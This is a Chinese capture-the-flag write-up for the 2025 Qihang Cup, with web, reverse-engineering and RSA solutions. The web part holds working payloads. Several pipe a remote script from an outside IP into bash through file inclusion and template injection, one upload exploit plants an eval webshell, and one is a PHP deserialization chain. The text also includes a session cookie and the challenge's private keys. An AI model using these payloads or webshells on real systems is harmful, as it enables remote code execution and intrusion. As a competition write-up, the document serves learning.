2025启航杯wp

启航杯

2025启航杯wp

Web

Easy-include

我是反弹shell做的，一开始直接cat没出，可能权限问题？
不知道为啥

直接shell吧

1	`http://154.64.245.108:33142/?file=data://text/plain,<?=system("curl http://8.138.152.157/1.txt \| bash");?>`

Web_IP

php SSTI
payload

1	`X-Forwarded-For: {if system('curl http://8.138.152.157/1.txt \| bash')}{/if}`

POC

GET /flag.php HTTP/1.1
Host: 8.219.82.75:32899
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
X-Forwarded-For:  {if system('curl http://8.138.152.157/1.txt | bash')}{/if}
Referer: http://8.219.82.75:32899/hint.php
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: GZCTF_Token=CfDJ8DRLK91Ea7BDvhbkEMqLA1qLH4Yg0rMm1mU6VkaBXyNvfb5Ixp8P7ZMeXIAVEuV1FMONm8oX9rdlahD4mny99zPTWjvIKwv282P8pzcMu8enKGPig3MMcEaS3z4uqq3Q34veSlBnEpi3Ds7x3wzJEsOQvKHb8ATV-E0G1r7r06ld8djHgYQDznSwJzRJy96agc-dBqSTXEHyVgEuLC74gEKurlh4oaX0lWQ5Fn9qQ5NY_t3EeJIdZfV2WXlo-QGdWFDssvfsY1F0fEKt-ew8WDea8PFh4cIfbEqkxiGezfzRRC3bQEmwGI9flHPZ2RKJRh6lEWwwMG9HLz5fxL7MWIsiHPo9TxYgWOniQWUuIPIueMirZ_tx9R_IQTM0Rz6-Kitq6JfAYoGfd4L5hjF2VfTQM3wGkuau3khWBlLTQc_K4X8FeF6ofBOe6eoPlJ5Eby4TiMgmtjqs9f0ZCysPSY8j-6FENv4nH_5mpwTOETZjovNjyzvTSVwTpNkkcR3yok_NMH1Nxo_1aR7PKdTScj3rGdIgyfBEZ8Y6A13gBVvMc3FdTFjtp1p0FGS5RKQZhH3UdivREFF9CGeZ_eQ2MuZZblhCUMyw5nQGU4kY_kGGu1qPQVucCxBnn7ETM0A5IEG1rIrxcQY7zvLqUMEUkHpzOn6y2BMK7m8DvscnP8MmteYlUkxcZfRMtc4PoLkHYHpyvdMfslgc3yMIFxWf92a1sKpTgB-Iuw6PSJejsLBZ
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0

这个要注意得cat ../../../flag，穿越到根目录下，他有两个flag，有一个是假的。

PCREMagic

EXP

import requests
from io import BytesIO
files = {
  'file': BytesIO(b'aaa<?php eval($_POST[xu7]);//' + b'a' * 1000000)
}
res = requests.post('http://challenge.qihangcup.cn:34096/index.php', files=files, allow_redirects=False)
print(res.headers)

0cef7481b89993d2c30d17e792fba06

1	`http://challenge.qihangcup.cn:34096/data/794ad58c6b1d00f7f529264e05f31ead/5.php`

上蚁剑

e90618dfd7f33d779e3749e15151e10

Web_pop

<?php

class Start {
    public $name;
    public $func;
}

class Sec {
    public $obj;
    public $var;
}

class Easy {
    public $cla;
}

class eeee {
    public $obj;
}

// 构造反序列化链
$a = new Start();
$b = new Sec();
$c = new Easy();
$d = new eeee();
$a1 = new Start();
$b1 = new Sec();


$a->name = $b; // Start->name = Sec
$b->obj = $c; // Sec->obj = Easy
$b->var = $d; // Sec-> var =eeee
$d->obj = $a1;  // eeee->obj = Start
$a1->func = $b1; // Start->func = Sec

// 序列化
$serialized = serialize($a);
echo $serialized;
// O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:4:"func";O:3:"Sec":2:{s:3:"obj";N;s:3:"var";N;}}}}s:4:"func";N;}

payload

1
2

POST 
pop=O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:4:"func";O:3:"Sec":2:{s:3:"obj";N;s:3:"var";N;}}}}s:4:"func";N;}

Reverse

checker

主函数逻辑很简单，就是先输入然后调用check

验证函数，调用了加密函数，然后用加密结果去和密文比较，密文已经给了，直接dump就行

encrypted_flag

加密函数``encrypt_flag，逐位亦或0x23`

解密脚本

data = [
    0x72, 0x6B, 0x60, 0x77, 0x65, 0x58, 0x46, 0x46,
    0x15, 0x40, 0x14, 0x41, 0x1A, 0x40, 0x0E, 0x46,
    0x14, 0x45, 0x16, 0x0E, 0x17, 0x45, 0x42, 0x41,
    0x0E, 0x1A, 0x41, 0x47, 0x45, 0x0E, 0x46, 0x42,
    0x13, 0x14, 0x46, 0x13, 0x10, 0x17, 0x45, 0x15,
    0x42, 0x16, 0x5E
]

xor_value = 0x23
result_chars = ''.join(chr(byte ^ xor_value) for byte in data)
print("flag:", result_chars)

# flag: QHCTF{ee6c7b9c-e7f5-4fab-9bdf-ea07e034f6a5}

note

查壳，UPX -d直接可以脱掉

主函数，对dest加密得到密文s2，将得到的密文和输入的密码进行check，dest直接dump，注意这里是43字节

加密函数，这里进行了两次亦或，v6是小端序，四字节42 37 A1 7C

解密脚本

key = [0x42, 0x37, 0xA1, 0x7C]
dest = [0x12, 0x7D, 0xE1, 0x2C, 0x01, 0x4A, 0xC4, 0x45, 0x78, 0x5E, 0xC9, 0x46, 0x78, 0x5D, 0x83, 0x0F, 0x37, 0x12, 0xD0, 0x45, 0x63, 0x42, 0xD5, 0x57, 0x76, 0x14, 0xDE, 0x06, 0x6E, 0x04, 0x8F, 0x3E, 0x50, 0x21, 0xE1, 0x3B, 0x53, 0x72, 0xB7, 0x6C, 0x5D, 0x79, 0xF7]
a2 = []

for i in range(len(dest)):
    tmp = dest[i] ^ key[i % 4]  
    tmp = tmp ^ (i + 1)      
    a2.append(chr(tmp))       

result = ''.join(a2)

print("flag: ",result)

# flag:  QHCTF{b13cc67d-cd7b-4cc3-9df1-1b34cc4c186d}

rainbow

附件给了加密密文

直接进hide_flag()函数

加密是直接亦或了0x5A

解密脚本

hex_string = "0B12190E1C213B6268686C6B6A69776F3B633B776E3C3B6D773B38393C773E3F3B6E69623B6D393F6D6227"
byte_array = bytes.fromhex(hex_string)
xor_key = 0x5A
result = bytearray()

for byte in byte_array:
    result.append(byte ^ xor_key)

result_hex = result.hex() 
result_string = result.decode(errors='ignore')  
print("flag:", result_string)

# flag: QHCTF{a8226103-5a9a-4fa7-abcf-dea438a7ce78}

Crypto

Easy_RSA

简单rsa

# -*- coding: utf-8 -*-
"""
Created on Sat Jan 25 15:15:00 2025

@author: yinao
"""
# -*- coding: utf-8 -*-
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64

# 第一组密钥和加密消息
private_key_1 = b'-----BEGIN RSA PRIVATE KEY-----\nMIICWwIBAAKBgQDH1WQoDn3PRd6RBFz0cX3w2qJNmkulEB16QRYhVYI4fKD3wIWE\nXNb3nAvvQ+EAfrhMHKjVE/9jEK68QnIPvKhBPGni1AJ0/2QeNlA3ab1ATy337ZCw\n9AaW5fwnhw5ZNteC1QUdus1iuRDZomdegyTbFnrzvnr0veu5qvlh7WwBeQIDAQAB\nAoGABEuOQKyoEFqReTc5asEeOn0uiCG4/sIhChHIUJzahM2L9atIC2Nl9PJAEOtZ\n9JVkr3EdwV+xyW6wPMhmVHeC+8Mypn3K+aWct8C1GGo7qnP/XfAzoiFt+6CU58FK\nfVcnzFPF2g9vT/d66ugoS3X+SU+GYQ5t2R8sh+JLZgVLv4ECQQDLx1XPFQUzniy7\naNK7QOer38ZSWZG7YPNyr/N6DIfU65Lj7RJOWnew5kxVFLCoWYqhbULkj3/RkcSt\n1cSordaBAkEA+ws+If0lLUb6js8b7Ui4v1NijKP9kNCEqCeXFbVxCQbcO6olfw4A\n5px5+pKyhwlSiTy+/lR95Hx6AcpNHBNe+QJAM20Dt7XrUSJ60XTbsYvoq1RWvVOD\nVpFZ/rhurn9ZDB/DOygJ9aIZEJid7N7C0kl+lcx4FCwuqpmp0+Ddt1/fgQJAbnsy\nKu8nb1evaS4IklLQy5K86jw5mYPK/d3+hdVGG7zjK3bj7ZiSGOuAWyA4ZWla437S\nZ0dz6BxH7YXEjbiQsQJAVCYj4bzNKjkdNHpbXEN3Ll12S3JnyElBSdMLpafi4tf0\nGbpgoePtKjQFb6pU4NXxMMgvxNT5q2BI7F9PUStH4A==\n-----END RSA PRIVATE KEY-----'
enmessage_1 = "YVhEwohz+9XA8bGkIxoSQTJRKURYbVGZJSeG66Pf4G6a0Vvza6Z/gnlKzsXHdTg77LvrqG9FcZa68+HCPib4D75p4wgNcj01ChFKCgeApitUDxkNw7cDF934A9KZ0PnyRTWsS+0skphY3wsyQaxNgpUXY7WX0A88AVmcHrCa/6A="

# 第二组密钥和加密消息
private_key_2 = b'-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQC7g4FElx5lh4CcdzdUyI+SObMgaQr3w/ahv7+FpI+5ssrAQp2S\nf0Mb5iCtkT2SqLFGHlE2mjycS7Thmldw7f9T+i1zkpfPfAsFnc9ubWGBhQ6+aDZt\nnbvla10nXxrby9gkkJcg2Qjk6D7Wjc76shsH9yNhfAxmYY/2S64CD1uNfQIDAQAB\nAoGACmf444qTaEUF0SkYi/75YL8M/s51ilx4sm9GvK7uPvr6H4NS5U9ktQanZ5p4\n1UvBUsfZ7/LNTEszRZXgJmc+1RzKCeM+xBm+Q6WFLsIkJtkVoscb45CCXrlSSOwi\npF/tfnmWZGVRKm5gzXKAlWZnZReRxKpc3mTboP0sqMOoCE0CQQDFw6YAkMO1S+2B\ntBLTJvLp9xcKCPr+hLdophSpLQExGRQvSHjq6SwmkaoHegngoFOXmeNb99yEZ1J/\nh5vY5Sp7AkEA8rsfn1rsfQZelUGPCHZRJAhjrELMVpR/VIFHnNTUlNfP5jVjUpkW\neYM8MyGijE17FIN+QcIhtZlpY7gtLS+CZwJARbZoB/7/3iK7wGL319L9AhiF2JW9\n1IZ4GL2ivtgMeYA7q0dCyJwVYisq4qPUY4hgryoiCUNgSpQZcrcc6uItjQJARZuX\n4/EFJI1xDkhwpjKX7kdhngLB6opHQYqZaMY3+D8zZYcl5of0RAB4gQlCPg3yH93d\nlSoA1L0b1fb5LZ4UPQJBAIloV3ZmziPQVG7/P6Jq5wJiumHtg4ZFr6Ja6xufocw2\nvBzCI9nAJp9rLcnzgMSSV1hpCWW3pieZxaWyH8JCRhM=\n-----END RSA PRIVATE KEY-----'
enmessage_2 = "mqEPcZJsctA2nj+U9o6uWyu1P9qxO2psdkzlygzbZBgXGfFCt2xuz/ZY1UT1DXODcMacc4lFMi7xiOMR5Ih6gOTYhKOcskco4ViYtwrdjSlKhnj8bTVYUqFXEKghP0kUYGk9CjoHDZ0XqSn6M3UiXAZ8sgCgIGN+6XcegryDyPQ="

def decrypt_message(encrypted_message, private_key):
    # Base64解码
    encrypted_data = base64.b64decode(encrypted_message)
    
    # 导入私钥
    key = RSA.import_key(private_key)
    
    # 使用PKCS1_OAEP解密
    cipher = PKCS1_OAEP.new(key)
    decrypted_message = cipher.decrypt(encrypted_data)
    
    return decrypted_message.decode()

# 解密第一组消息
decrypted_1 = decrypt_message(enmessage_1, private_key_1)
print("解密后的消息 1:")
print(decrypted_1)

# 解密第二组消息
decrypted_2 = decrypt_message(enmessage_2, private_key_2)
print("解密后的消息 2:")
print(decrypted_2)